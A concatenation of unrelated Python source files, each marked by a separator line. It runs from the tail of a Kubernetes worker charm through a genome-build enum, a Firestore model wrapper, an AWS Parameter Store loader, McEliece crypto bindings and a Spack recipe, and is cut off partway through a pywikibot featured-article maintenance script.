# If we already have the definition, its probably safe to assume
# creation was true.
if kubectl_success('get', '-f', manifest):
hookenv.log('Skipping definition for {}'.format(manifest))
return True
# Execute the requested command that did not match any of the special
# cases above
return kubectl_success(operation, '-f', manifest)
@when('nrpe-external-master.available')
@when_not('nrpe-external-master.initial-config')
def initial_nrpe_config(nagios=None):
set_state('nrpe-external-master.initial-config')
update_nrpe_config(nagios)
@when('kubernetes-worker.config.created')
@when('nrpe-external-master.available')
@when_any('config.changed.nagios_context',
'config.changed.nagios_servicegroups')
def update_nrpe_config(unused=None):
services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon')
hostname = nrpe.get_nagios_hostname()
current_unit = nrpe.get_nagios_unit_name()
nrpe_setup = nrpe.NRPE(hostname=hostname)
nrpe.add_init_service_checks(nrpe_setup, services, current_unit)
nrpe_setup.write()
@when_not('nrpe-external-master.available')
@when('nrpe-external-master.initial-config')
def remove_nrpe_config(nagios=None):
remove_state('nrpe-external-master.initial-config')
# List of systemd services for which the checks will be removed
services = ('snap.kubelet.daemon', 'snap.kube-proxy.daemon')
# The current nrpe-external-master interface doesn't handle a lot of logic,
# use the charm-helpers code for now.
hostname = nrpe.get_nagios_hostname()
nrpe_setup = nrpe.NRPE(hostname=hostname)
for service in services:
nrpe_setup.remove_check(shortname=service)
def set_privileged():
"""Update the allow-privileged flag for kubelet.
"""
privileged = hookenv.config('allow-privileged')
if privileged == 'auto':
gpu_enabled = is_state('kubernetes-worker.gpu.enabled')
privileged = 'true' if gpu_enabled else 'false'
if privileged == 'true':
set_state('kubernetes-worker.privileged')
else:
remove_state('kubernetes-worker.privileged')
@when('config.changed.allow-privileged')
@when('kubernetes-worker.config.created')
def on_config_allow_privileged_change():
"""React to changed 'allow-privileged' config value.
"""
set_state('kubernetes-worker.restart-needed')
remove_state('config.changed.allow-privileged')
@when('cuda.installed')
@when('kubernetes-worker.config.created')
@when_not('kubernetes-worker.gpu.enabled')
def enable_gpu():
"""Enable GPU usage on this node.
"""
config = hookenv.config()
if config['allow-privileged'] == "false":
hookenv.status_set(
'active',
'GPUs available. Set allow-privileged="auto" to enable.'
)
return
hookenv.log('Enabling gpu mode')
try:
# Not sure why this is necessary, but if you don't run this, k8s will
# think that the node has 0 gpus (as shown by the output of
# `kubectl get nodes -o yaml`
check_call(['nvidia-smi'])
except CalledProcessError as cpe:
hookenv.log('Unable to communicate with the NVIDIA driver.')
hookenv.log(cpe)
return
# Apply node labels
_apply_node_label('gpu=true', overwrite=True)
_apply_node_label('cuda=true', overwrite=True)
set_state('kubernetes-worker.gpu.enabled')
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.gpu.enabled')
@when_not('kubernetes-worker.privileged')
@when_not('kubernetes-worker.restart-needed')
def disable_gpu():
"""Disable GPU usage on this node.
This handler fires when we're running in gpu mode, and then the operator
sets allow-privileged="false". Since we can no longer run privileged
containers, we need to disable gpu mode.
"""
hookenv.log('Disabling gpu mode')
# Remove node labels
_apply_node_label('gpu', delete=True)
_apply_node_label('cuda', delete=True)
remove_state('kubernetes-worker.gpu.enabled')
set_state('kubernetes-worker.restart-needed')
@when('kubernetes-worker.gpu.enabled')
@when('kube-control.connected')
def notify_master_gpu_enabled(kube_control):
"""Notify kubernetes-master that we're gpu-enabled.
"""
kube_control.set_gpu(True)
@when_not('kubernetes-worker.gpu.enabled')
@when('kube-control.connected')
def notify_master_gpu_not_enabled(kube_control):
"""Notify kubernetes-master that we're not gpu-enabled.
"""
kube_control.set_gpu(False)
@when('kube-control.connected')
def request_kubelet_and_proxy_credentials(kube_control):
""" Request kubelet node authorization with a well formed kubelet user.
This also implies that we are requesting kube-proxy auth. """
# The kube-cotrol interface is created to support RBAC.
# At this point we might as well do the right thing and return the hostname
# even if it will only be used when we enable RBAC
nodeuser = 'system:node:{}'.format(gethostname().lower())
kube_control.set_auth_request(nodeuser)
@when('kube-control.connected')
def catch_change_in_creds(kube_control):
"""Request a service restart in case credential updates were detected."""
nodeuser = 'system:node:{}'.format(gethostname().lower())
creds = kube_control.get_auth_credentials(nodeuser)
if creds \
and data_changed('kube-control.creds', creds) \
and creds['user'] == nodeuser:
# We need to cache the credentials here because if the
# master changes (master leader dies and replaced by a new one)
# the new master will have no recollection of our certs.
db.set('credentials', creds)
set_state('worker.auth.bootstrapped')
set_state('kubernetes-worker.restart-needed')
@when_not('kube-control.connected')
def missing_kube_control():
"""Inform the operator they need to add the kube-control relation.
If deploying via bundle this won't happen, but if operator is upgrading a
a charm in a deployment that pre-dates the kube-control relation, it'll be
missing.
"""
hookenv.status_set(
'blocked',
'Relate {}:kube-control kubernetes-master:kube-control'.format(
hookenv.service_name()))
@when('docker.ready')
def fix_iptables_for_docker_1_13():
""" Fix iptables FORWARD policy for Docker >=1.13
https://github.com/kubernetes/kubernetes/issues/40182
https://github.com/kubernetes/kubernetes/issues/39823
"""
cmd = ['iptables', '-w', '300', '-P', 'FORWARD', 'ACCEPT']
check_call(cmd)
def _systemctl_is_active(application):
''' Poll systemctl to determine if the application is running '''
cmd = ['systemctl', 'is-active', application]
try:
raw = check_output(cmd)
return b'active' in raw
except Exception:
return False
class GetNodeNameFailed(Exception):
pass
def get_node_name():
# Get all the nodes in the cluster
cmd = 'kubectl --kubeconfig={} get no -o=json'.format(kubeconfig_path)
cmd = cmd.split()
deadline = time.time() + 60
while time.time() < deadline:
try:
raw = check_output(cmd)
break
except CalledProcessError:
hookenv.log('Failed to get node name for node %s.'
' Will retry.' % (gethostname()))
time.sleep(1)
else:
msg = 'Failed to get node name for node %s' % gethostname()
raise GetNodeNameFailed(msg)
result = json.loads(raw.decode('utf-8'))
if 'items' in result:
for node in result['items']:
if 'status' not in node:
continue
if 'addresses' not in node['status']:
continue
# find the hostname
for address in node['status']['addresses']:
if address['type'] == 'Hostname':
if address['address'] == gethostname():
return node['metadata']['name']
# if we didn't match, just bail to the next node
break
msg = 'Failed to get node name for node %s' % gethostname()
raise GetNodeNameFailed(msg)
class ApplyNodeLabelFailed(Exception):
pass
def _apply_node_label(label, delete=False, overwrite=False):
''' Invoke kubectl to apply node label changes '''
nodename = get_node_name()
# TODO: Make this part of the kubectl calls instead of a special string
cmd_base = 'kubectl --kubeconfig={0} label node {1} {2}'
if delete is True:
label_key = label.split('=')[0]
cmd = cmd_base.format(kubeconfig_path, nodename, label_key)
cmd = cmd + '-'
else:
cmd = cmd_base.format(kubeconfig_path, nodename, label)
if overwrite:
cmd = '{} --overwrite'.format(cmd)
cmd = cmd.split()
deadline = time.time() + 60
while time.time() < deadline:
code = subprocess.call(cmd)
if code == 0:
break
hookenv.log('Failed to apply label %s, exit code %d. Will retry.' % (
label, code))
time.sleep(1)
else:
msg = 'Failed to apply label %s' % label
raise ApplyNodeLabelFailed(msg)
def _parse_labels(labels):
''' Parse labels from a key=value string separated by space.'''
label_array = labels.split(' ')
sanitized_labels = []
for item in label_array:
if '=' in item:
sanitized_labels.append(item)
else:
hookenv.log('Skipping malformed option: {}'.format(item))
return sanitized_labels
|
py | 1a4fa37a55fa187c82bf5bf2a9c7821a8be7b902 | '''
Classe Televisao
Atributos:
-> canal = None
-> volume = 0
Metodos:
aumentar_volume: aumenta em 1 unidade
diminuir_volume: diminui em 1 unidade
alterar_canal(canal)
'''
class Televisao:
def __init__(self):
self.canal = None
self.volume = 0
def aumentar_volume(self):
self.volume += 1
def diminuir_volume(self):
self.volume -= 1
def alterar_canal(self, canal):
self.canal = canal
# criar objeto
tv = Televisao()
tv.aumentar_volume()
tv.aumentar_volume()
tv.aumentar_volume()
tv.diminuir_volume()
tv.alterar_canal(5)
tv.alterar_canal(11)
print("Volume é:", tv.volume)
print("canal é:", tv.canal)
|
py | 1a4fa3a655ff2bbdbe054062b60086bb637480bb | from enum import Enum
class GenomeBuild(Enum):
GRCH37 = 0
GRCH38 = 1
MM9 = 2
MM10 = 3
RN6 = 4
@staticmethod
def parse(s: str) -> "GenomeBuild":
if s == "GRCh37":
return GenomeBuild.GRCH37
elif s == "GRCh38":
return GenomeBuild.GRCH38
elif s == "mm9":
return GenomeBuild.MM9
elif s == "mm10":
return GenomeBuild.MM10
elif s == "rn6":
return GenomeBuild.RN6
else:
raise ValueError("invalid genome build: '{}'".format(s))
def __str__(self) -> str:
if self == GenomeBuild.GRCH37:
return "GRCh37"
elif self == GenomeBuild.GRCH38:
return "GRCh38"
elif self == GenomeBuild.MM9:
return "mm9"
elif self == GenomeBuild.MM10:
return "mm10"
elif self == GenomeBuild.RN6:
return "rn6"
else:
raise ValueError("unreachable")
|
py | 1a4fa40ac129a51e7ea9d5173b15cb9d29dc7804 | import os
import cv2
import numpy as np
import tqdm
from common import my_utils
def improve_depth(image, depth, threshold=0.001, threshold_faraway_planes=False):
window_size = 20
width = image.shape[0]
height = image.shape[1]
if threshold_faraway_planes:
# NOTE: This could be PERHAPS useful for cases where the depth map is really bad / inexistent
# for faraway planes; unchanging neighborhood in depth image sometimes means no data which,
# generally, means too close or too far for measurement; this is dangerous and should probably be done offline
for i in range(0, width - window_size, window_size // 5):
for j in range(0, height - window_size, window_size // 5):
patch = image[i:i + window_size, j:j + window_size]
if np.std(patch) < threshold:
depth[i:i + window_size, j:j + window_size] = 300
depth = cv2.GaussianBlur(depth, (7, 7), 1)
return depth
def process_all(images_path, depth_path, output_path):
img_names = my_utils.os_listdir(images_path)
depth_names = my_utils.os_listdir(depth_path)
beta = 0
pbar = tqdm.tqdm(total=len(img_names))
for name_file, depth_file in zip(img_names, depth_names):
pbar.update(1)
img = cv2.imread(os.path.join(images_path, name_file))
gray_img = cv2.cvtColor(img, cv2.COLOR_BGRA2GRAY)
# divided by 256 to convert it into metres
original_depth = cv2.imread(os.path.join(depth_path, depth_file), cv2.IMREAD_UNCHANGED) / 256
smooth_depth = improve_depth(gray_img, original_depth, threshold=beta)
np.save(os.path.join(output_path, name_file), smooth_depth)
|
py | 1a4fa605a0deb35d41ce025ea87d27aa44f6792d | from fireo.fields import ReferenceField, NestedModel, IDField
from fireo.queries import errors
from fireo.utils import utils
from google.cloud import firestore
class ModelWrapper:
"""Convert query result into Model instance"""
@classmethod
def from_query_result(cls, model, doc, nested_doc=False):
parent_key = None
if nested_doc:
doc_dict = doc
elif doc:
parent_key = utils.get_parent_doc(doc.reference.path)
if doc.to_dict() is not None:
doc_dict = doc.to_dict()
else:
return None
else:
return None
# instance values is changed according to firestore
# so mark it modified this will help later for figuring
# out the updated fields when need to update this document
setattr(model, '_instance_modified', True)
for k, v in doc_dict.items():
field = model._meta.get_field_by_column_name(k)
# if missing field setting is set to "ignore" then
# get_field_by_column_name return None So, just skip this field
if field is None:
continue
# Check if it is Reference field
if isinstance(field, ReferenceField):
val = ReferenceFieldWrapper.from_doc_ref(model, field, field.field_value(v))
elif isinstance(field, NestedModel):
nested_doc_val = field.field_value(v)
if nested_doc_val:
val = NestedModelWrapper.from_model_dict(field, nested_doc_val)
else:
val = None
else:
val = field.field_value(v)
setattr(model, field.name, val)
# If parent key is None but here is parent key from doc then set the parent for this model
# This is case when you filter the documents parent key not auto set just set it
if not model.parent and parent_key is not None:
model.parent = parent_key
# If it is not nested model then set the id for this model
if not nested_doc:
# When getting document attach the IDField if there is no user specify
# it will prevent to generate new id everytime when document save
# For more information see issue #45 https://github.com/octabytes/FireO/issues/45
if model._meta.id is None:
model._meta.id = ('id', IDField())
setattr(model, '_id', doc.id)
# save the firestore reference doc so that further actions can be performed (i.e. collections())
model._meta.set_reference_doc(doc.reference)
# even though doc.reference currently points to self, there is no guarantee this will be true
# in the future, therefore we should store the create time and update time separate.
model._meta._firestore_create_time = doc.create_time
model._meta._firestore_update_time = doc.update_time
return model
class NestedModelWrapper:
"""Get nested document"""
@classmethod
def from_model_dict(cls, field, doc):
model = field.nested_model()
return ModelWrapper.from_query_result(model, doc, nested_doc=True)
class ReferenceFieldWrapper:
"""Get reference documents
If auto_load is True then load the document otherwise return `ReferenceDocLoader` object and later user can use
`get()` method to retrieve the document
"""
@classmethod
def from_doc_ref(cls, parent_model, field, ref):
if not ref:
return None
ref_doc = ReferenceDocLoader(parent_model, field, ref)
if field.auto_load:
return ref_doc.get()
return ref_doc
class ReferenceDocLoader:
"""Get reference doc and Convert into model instance"""
def __init__(self, parent_model, field, ref):
self.parent_model = parent_model
self.field = field
self.ref = ref
def get(self):
doc = self.ref.get()
if not doc.exists:
raise errors.ReferenceDocNotExist(f'{self.field.model_ref.collection_name}/{self.ref.id} not exist')
model = ModelWrapper.from_query_result(self.field.model_ref(), doc)
# if on_load method is defined then call it
if self.field.on_load:
method_name = self.field.on_load
getattr(self.parent_model, method_name)(model)
return model
|
py | 1a4fa6679bbff9a96aa4c639ac3d1bd583f5839b | # -*- coding: utf-8 -*-
# Copyright: 2009 Nadia Alramli
# License: BSD
"""Draws an animated terminal progress bar
Usage:
p = ProgressBar("blue")
p.render(percentage, message)
"""
import terminal
import sys
class ProgressBar(object):
"""Terminal progress bar class"""
TEMPLATE = (
'%(percent)-2s%% %(color)s%(progress)s%(normal)s%(empty)s %(message)s\n'
)
PADDING = 7
def __init__(self, color=None, width=None, block='█', empty=' '):
"""
color -- color name (BLUE GREEN CYAN RED MAGENTA YELLOW WHITE BLACK)
width -- bar width (optinal)
block -- progress display character (default '█')
empty -- bar display character (default ' ')
"""
if color:
self.color = getattr(terminal, color.upper())
else:
self.color = ''
if width and width < terminal.COLUMNS - self.PADDING:
self.width = width
else:
# Adjust to the width of the terminal
self.width = terminal.COLUMNS - self.PADDING
self.block = block
self.empty = empty
self.progress = None
self.lines = 0
def render(self, percent, message = ''):
"""Print the progress bar
percent -- the progress percentage %
message -- message string (optional)
"""
inline_msg_len = 0
if message:
# The length of the first line in the message
inline_msg_len = len(message.splitlines()[0])
if inline_msg_len + self.width + self.PADDING > terminal.COLUMNS:
# The message is too long to fit in one line.
# Adjust the bar width to fit.
bar_width = terminal.COLUMNS - inline_msg_len -self.PADDING
else:
bar_width = self.width
# Check if render is called for the first time
if self.progress != None:
self.clear()
self.progress = (bar_width * percent) / 100
data = self.TEMPLATE % {
'percent': percent,
'color': self.color,
'progress': self.block * self.progress,
'normal': terminal.NORMAL,
'empty': self.empty * (bar_width - self.progress),
'message': message
}
sys.stdout.write(data)
sys.stdout.flush()
# The number of lines printed
self.lines = len(data.splitlines())
def clear(self):
"""Clear all printed lines"""
sys.stdout.write(
self.lines * (terminal.UP + terminal.BOL + terminal.CLEAR_EOL)
)
|
py | 1a4fa7619b32b3a0fd27f30d4f5925cc74dd1840 | from ui import UiFrame, Vect
class UiWifi(UiFrame):
def __init__(self, ofs, dim, hotspot):
super().__init__(ofs, dim)
self.hotspot = hotspot
def draw(self, ui, d):
ui.text(10, 'SSID:', Vect(0, 5))
ui.text(10, self.hotspot.ssid, Vect(30, 20))
ui.text(10, 'Password:', Vect(0, 35))
ui.text(10, self.hotspot.passwd, Vect(30, 50))
|
py | 1a4fa792fe1d594ca202ff924064c5eb779a8404 | """
Author : James McKain (@jjmckain)
Created : 2021-12-10
SCM Repo : https://github.com/Preocts/secretbox
"""
from __future__ import annotations
import logging
from typing import Any
from secretbox.aws_loader import AWSLoader
try:
import boto3
from botocore.exceptions import ClientError
except ImportError:
boto3 = None
try:
from mypy_boto3_ssm.client import SSMClient
except ImportError:
SSMClient = None
class AWSParameterStore(AWSLoader):
"""Load secrets from an AWS Parameter Store"""
def load_values(self, **kwargs: Any) -> bool:
"""
Load all secrets from AWS parameter store
Requires `aws_sstore_name` and `aws_region_name` keywords to be
provided or for those values to be in the environment variables
under `AWS_SSTORE_NAME` and `AWS_REGION_NAME`.
`aws_sstore_name` is the parameter name or prefix.
"""
if boto3 is None:
self.logger.debug("Skipping AWS loader, boto3 is not available.")
return False
self.populate_region_store_names(**kwargs)
if self.aws_sstore is None:
self.logger.warning("Missing parameter name")
return True # this isn't a failure on our part
aws_client = self.get_aws_client()
if aws_client is None:
self.logger.error("Invalid SSM client")
return False
# if the prefix contains forward slashes treat the last token as the key name
do_split = "/" in self.aws_sstore
try:
# ensure the http client doesn't write our sensitive payload to the logger
logging.getLogger("botocore.parsers").addFilter(self.secrets_filter)
args = {
"Path": self.aws_sstore,
"Recursive": True,
"MaxResults": 10,
"WithDecryption": True,
}
# loop through next page tokens, page size caps at 10
while True:
resp = aws_client.get_parameters_by_path(**args)
for param in resp["Parameters"] or []:
# remove the prefix
# we want /path/to/DB_PASSWORD to populate os.env.DB_PASSWORD
key = param["Name"].split("/")[-1] if do_split else param["Name"]
self.loaded_values[key] = param["Value"]
args["NextToken"] = resp.get("NextToken")
if not args["NextToken"]:
break
self.logger.debug("fetching next page: %s", args["NextToken"])
except ClientError as err:
self.log_aws_error(err)
return False
finally:
# remove our logging filter
logging.getLogger("botocore.parsers").removeFilter(self.secrets_filter)
self.logger.info(
"loaded %d parameters matching %s", len(self.loaded_values), self.aws_sstore
)
return True
def get_aws_client(self) -> SSMClient | None:
"""Make the connection"""
if self.aws_region is None:
self.logger.debug("Missing AWS region, cannot create client")
return None
return boto3.client(
service_name="ssm",
region_name=self.aws_region,
)
|
py | 1a4fa7be3507b40bb7bb85b7b1355ac13487a22d | import ctypes
from ctypes import c_int
from .lib import libmcleece
class PublicKey:
def __init__(self, data):
# check that length matches libmcleece length
self.data = data
def __bytes__(self):
return self.data
@classmethod
def size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_PUBLIC_KEY_SIZE').value
class PrivateKey:
def __init__(self, data):
# check that length matches libmcleece length
self.data = data
def __bytes__(self):
return self.data
@classmethod
def size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_SECRET_KEY_SIZE').value
@classmethod
def generate(cls):
pk_size = PublicKey.size()
sk_size = cls.size()
pk = (ctypes.c_uint8 * pk_size)()
sk = (ctypes.c_uint8 * sk_size)()
res = libmcleece().mcleece_crypto_box_keypair(ctypes.byref(pk), ctypes.byref(sk))
if res != 0:
return None
return PrivateKey(bytes(sk)), PublicKey(bytes(pk))
def get_nacl_public_key(self):
# truncate a copy of self.data, and pass to PrivateKey here...
from nacl.public import PrivateKey as nacl_PrivateKey
sodium_pkey_size = c_int.in_dll(libmcleece(), 'mcleece_crypto_box_SODIUM_PUBLIC_KEY_SIZE').value
return bytes(nacl_PrivateKey(self.data[:sodium_pkey_size]).public_key)
class SealedBox:
def __init__(self, key):
''' do something with the key here...
the decryption part is interesting, because libsodium needs both public+private keys
to do the decryption, but mcleece doesn't care about needing the public key.
But the *interface* doesn't have a good way to communicate that at the moment...
'''
self.public_key = self.secret_key = None
if isinstance(key, PublicKey):
self.public_key = (ctypes.c_uint8 * len(key.data)).from_buffer_copy(key.data)
elif isinstance(key, PrivateKey):
self.secret_key = (ctypes.c_uint8 * len(key.data)).from_buffer_copy(key.data)
pubkey = key.get_nacl_public_key()
self.public_key = (ctypes.c_uint8 * len(pubkey)).from_buffer_copy(pubkey)
@classmethod
def message_header_size(cls):
return c_int.in_dll(libmcleece(), 'mcleece_crypto_box_MESSAGE_HEADER_SIZE').value
def encrypt(self, msg):
if not self.public_key or len(self.public_key) < PublicKey.size():
raise Exception('not initialized for encryption!')
msg_size = len(msg)
msg = (ctypes.c_uint8 * msg_size).from_buffer_copy(msg)
ciphertext_size = msg_size + self.message_header_size()
ciphertext = (ctypes.c_uint8 * ciphertext_size)()
res = libmcleece().mcleece_crypto_box_seal(
ctypes.byref(ciphertext), ctypes.byref(msg), ctypes.c_uint32(msg_size), ctypes.byref(self.public_key)
)
if res != 0:
return None
return bytes(bytearray(ciphertext))
def decrypt(self, ciphertext):
if not self.secret_key or len(self.secret_key) < PrivateKey.size():
raise Exception('not initialized for decryption!')
ciphertext_size = len(ciphertext)
ciphertext = (ctypes.c_uint8 * ciphertext_size).from_buffer_copy(ciphertext)
msg_size = ciphertext_size - self.message_header_size()
msg = (ctypes.c_uint8 * msg_size)()
res = libmcleece().mcleece_crypto_box_seal_open(
ctypes.byref(msg), ctypes.byref(ciphertext), ctypes.c_uint32(ciphertext_size),
ctypes.byref(self.public_key), ctypes.byref(self.secret_key)
)
if res != 0:
return None
return bytes(bytearray(msg))
|
py | 1a4fa7f44a6847a924892d65d48eae36d78993e7 | # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class PyTypingExtensions(PythonPackage):
"""The typing_extensions module contains both backports of these
changes as well as experimental types that will eventually be
added to the typing module, such as Protocol (see PEP 544 for
details about protocols and static duck typing)."""
homepage = "https://github.com/python/typing/tree/master/typing_extensions"
pypi = "typing_extensions/typing_extensions-3.7.4.tar.gz"
version('3.10.0.2', sha256='49f75d16ff11f1cd258e1b988ccff82a3ca5570217d7ad8c5f48205dd99a677e')
version('3.10.0.0', sha256='50b6f157849174217d0656f99dc82fe932884fb250826c18350e159ec6cdf342')
version('3.7.4.3', sha256='99d4073b617d30288f569d3f13d2bd7548c3a7e4c8de87db09a9d29bb3a4a60c')
version('3.7.4', sha256='2ed632b30bb54fc3941c382decfd0ee4148f5c591651c9272473fea2c6397d95')
version('3.7.2', sha256='fb2cd053238d33a8ec939190f30cfd736c00653a85a2919415cecf7dc3d9da71')
version('3.6.6', sha256='51e7b7f3dcabf9ad22eed61490f3b8d23d9922af400fe6656cb08e66656b701f')
depends_on('[email protected]:2.8,3.4:', type=('build', 'run'))
depends_on('py-setuptools', type='build')
depends_on('[email protected]:', when='@3.7: ^python@:3.4', type=('build', 'run'))
depends_on('[email protected]:', when='^python@:3.4', type=('build', 'run'))
|
py | 1a4fa9ae84bf92f4c60f61a21f0b3c883333645e | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Manage featured/good article/list status template.
*** This script understands various command-line arguments: ***
Task commands:
-featured use this script for featured articles. Default task
if no task command is specified
-good use this script for good articles.
-lists use this script for featured lists.
-former use this script for removing {{Link FA|xx}} from former
fearured articles
NOTE: you may have all of these commands in one run
Option commands:
-interactive: ask before changing each page
-nocache doesn't include cache files file to remember if the article
already was verified.
-nocache:xx,yy you may ignore language codes xx,yy,... from cache file
-fromlang:xx,yy xx,yy,zz,.. are the languages to be verified.
-fromlang:ar--fi Another possible with range the languages
-fromall to verify all languages.
-tolang:xx,yy xx,yy,zz,.. are the languages to be updated
-after:zzzz process pages after and including page zzzz
(sorry, not implemented yet)
-side use -side if you want to move all {{Link FA|lang}} next
to the corresponding interwiki links. Default is placing
{{Link FA|lang}} on top of the interwiki links.
(This option is deprecated with wikidata)
-count Only counts how many featured/good articles exist
on all wikis (given with the "-fromlang" argument) or
on several language(s) (when using the "-fromall" argument).
Example: python pwb.py featured -fromlang:en,he -count
counts how many featured articles exist in the en and he
wikipedias.
-quiet no corresponding pages are displayed.
"""
#
# (C) Maxim Razin, 2005
# (C) Leonardo Gregianin, 2005-2008
# (C) xqt, 2009-2019
# (C) Pywikibot team, 2005-2019
#
# Distributed under the terms of the MIT license.
#
from __future__ import absolute_import, division, unicode_literals
import pickle
import re
import pywikibot
from pywikibot import i18n, textlib, config
from pywikibot.pagegenerators import PreloadingGenerator
from pywikibot.tools.formatter import color_format
from pywikibot.tools import issue_deprecation_warning, PY2
if not PY2:
unichr = chr
def CAT(site, name, hide):
name = site.namespace(14) + ':' + name
cat = pywikibot.Category(site, name)
for article in cat.articles(endsort=hide):
yield article
if hide:
for article in cat.articles(startFrom=unichr(ord(hide) + 1)):
yield article
def BACK(site, name, hide): # pylint: disable=unused-argument
p = pywikibot.Page(site, name, ns=10)
return [page for page in p.getReferences(follow_redirects=False,
only_template_inclusion=True)]
def DATA(site, name, hide):
dp = pywikibot.ItemPage(site.data_repository(), name)
try:
title = dp.getSitelink(site)
except pywikibot.NoPage:
return
cat = pywikibot.Category(site, title)
if isinstance(hide, dict):
hide = hide.get(site.code)
for article in cat.articles(endsort=hide):
yield article
if hide:
for article in cat.articles(startsort=unichr(ord(hide) + 1)):
yield article
# not implemented yet
def TMPL(site, name, hide): # pylint: disable=unused-argument
return
# ALL wikis use 'Link FA', and sometimes other localized templates.
# We use _default AND the localized ones
template = {
'_default': ['Link FA'],
'als': ['LinkFA'],
'an': ['Destacato', 'Destacau'],
'ar': ['وصلة مقالة مختارة'],
'ast': ['Enllaz AD'],
'az': ['Link FM'],
'br': ['Liamm PuB', 'Lien AdQ'],
'ca': ['Enllaç AD', 'Destacat'],
'cy': ['Cyswllt erthygl ddethol', 'Dolen ED'],
'eo': ['LigoElstara'],
'en': ['Link FA', 'FA link'],
'es': ['Destacado'],
'eu': ['NA lotura'],
'fr': ['Lien AdQ'],
'fur': ['Leam VdC'],
'ga': ['Nasc AR'],
'gl': ['Ligazón AD', 'Destacado'],
'hi': ['Link FA', 'Lien AdQ'],
'is': ['Tengill ÚG'],
'it': ['Link V', 'Link AdQ'],
'no': ['Link UA'],
'oc': ['Ligam AdQ', 'Lien AdQ'],
'ro': ['Legătură AC', 'Legătură AF'],
'sv': ['UA', 'Link UA'],
'tr': ['Link SM'],
'vi': ['Liên kết chọn lọc'],
'vo': ['Yüm YG'],
'yi': ['רא'],
}
template_good = {
'_default': ['Link GA'],
'ar': ['وصلة مقالة جيدة'],
'ca': ['Enllaç AB', 'Lien BA', 'Abo'],
'da': ['Link GA', 'Link AA'],
'eo': ['LigoLeginda'],
'es': ['Bueno'],
'fr': ['Lien BA'],
'gl': ['Ligazón AB'],
'is': ['Tengill GG'],
'it': ['Link VdQ'],
'nn': ['Link AA'],
'no': ['Link AA'],
'pt': ['Bom interwiki'],
# 'tr': ['Link GA', 'Link KM'],
'vi': ['Liên kết bài chất lượng tốt'],
'wo': ['Lien BA'],
}
template_lists = {
'_default': ['Link FL'],
'no': ['Link GL'],
}
featured_name = {
'wikidata': (DATA, 'Q4387444'),
}
good_name = {
'wikidata': (DATA, 'Q7045856'),
}
lists_name = {
'wikidata': (TMPL, 'Q5857568'),
'ar': (BACK, 'قائمة مختارة'),
'da': (BACK, 'FremragendeListe'),
'de': (BACK, 'Informativ'),
'en': (BACK, 'Featured list'),
'fa': (BACK, 'فهرست برگزیده'),
'id': (BACK, 'Featured list'),
'ja': (BACK, 'Featured List'),
'ksh': (CAT, 'Joode Leß'),
'no': (BACK, 'God liste'),
'pl': (BACK, 'Medalista'),
'pt': (BACK, 'Anexo destacado'),
'ro': (BACK, 'Listă de calitate'),
'ru': (BACK, 'Избранный список или портал'),
'tr': (BACK, 'Seçkin liste'),
'uk': (BACK, 'Вибраний список'),
'vi': (BACK, 'Sao danh sách chọn lọc'),
'zh': (BACK, '特色列表'),
}
# Third parameter is the sort key indicating articles to hide from the given
# list
former_name = {
'wikidata': (DATA, 'Q7045853', {'en': '#'})
}
class FeaturedBot(pywikibot.Bot):
"""Featured article bot."""
# Bot configuration.
# Only the keys of the dict can be passed as init options
# The values are the default values
def __init__(self, **kwargs):
"""Only accepts options defined in availableOptions."""
self.availableOptions.update({
'async': False, # True for asynchronously putting a page
'afterpage': '!',
'count': False, # featuredcount
'featured': False,
'former': False,
'fromall': False,
'fromlang': None,
'good': False,
'lists': False,
'nocache': [],
'side': False, # not template_on_top
'quiet': False,
'interactive': False,
})
super(FeaturedBot, self).__init__(**kwargs)
self.cache = {}
self.filename = None
self.site = pywikibot.Site()
self.repo = self.site.data_repository()
# if no source site is given, give up
if self.getOption('fromlang') is True:
self.options['fromlang'] = False
# setup tasks running
self.tasks = []
for task in ('featured', 'good', 'lists', 'former'):
if self.getOption(task):
self.tasks.append(task)
if not self.tasks:
self.tasks = ['featured']
def itersites(self, task):
"""Generator for site codes to be processed."""
def _generator():
if task == 'good':
item_no = good_name['wikidata'][1]
elif task == 'featured':
item_no = featured_name['wikidata'][1]
elif task == 'former':
item_no = former_name['wikidata'][1]
dp = pywikibot.ItemPage(self.repo, item_no)
dp.get()
for key in sorted(dp.sitelinks.keys()):
try:
site = self.site.fromDBName(key)
except pywikibot.SiteDefinitionError:
pywikibot.output('"%s" is not a valid site. Skipping...'
% key)
else:
if site.family == self.site.family:
yield site
generator = _generator()
if self.getOption('fromall'):
return generator
elif self.getOption('fromlang'):
fromlang = self.getOption('fromlang')
if len(fromlang) == 1 and fromlang[0].find('--') >= 0:
start, end = fromlang[0].split('--', 1)
if not start:
start = ''
if not end:
end = 'zzzzzzz'
return (site for site in generator
if site.code >= start and site.code <= end)
else:
return (site for site in generator if site.code in fromlang)
else:
pywikibot.warning('No sites given to verify %s articles.\n'
'Please use -fromlang: or fromall option\n'
% task)
return ()
def hastemplate(self, task):
add_tl, remove_tl = self.getTemplateList(self.site.code, task)
for i, tl in enumerate(add_tl):
tp = pywikibot.Page(self.site, tl, ns=10)
if tp.exists():
return True
else:
pywikibot.output(tl + ' does not exist')
# The first item is the default template to be added.
# It must exist. Otherwise the script must not run.
if i == 0:
return
else:
return
def readcache(self, task):
if self.getOption('count') or self.getOption('nocache') is True:
return
self.filename = pywikibot.config.datafilepath('cache', task)
try:
f = open(self.filename, 'rb')
self.cache = pickle.load(f)
f.close()
pywikibot.output('Cache file %s found with %d items.'
% (self.filename, len(self.cache)))
except IOError:
pywikibot.output('Cache file %s not found.' % self.filename)
def writecache(self):
if self.getOption('count'):
return
if not self.getOption('nocache') is True:
pywikibot.output('Writing %d items to cache file %s.'
% (len(self.cache), self.filename))
with open(self.filename, 'wb') as f:
pickle.dump(self.cache, f, protocol=config.pickle_protocol)
self.cache = {}
def run(self):
for task in self.tasks:
self.run_task(task)
pywikibot.output('%d pages written.' % self._save_counter)
def run_task(self, task):
if not self.hastemplate(task):
pywikibot.output('\nNOTE: %s articles are not implemented at %s.'
% (task, self.site))
return
self.readcache(task)
for site in self.itersites(task):
try:
self.treat(site, task)
except KeyboardInterrupt:
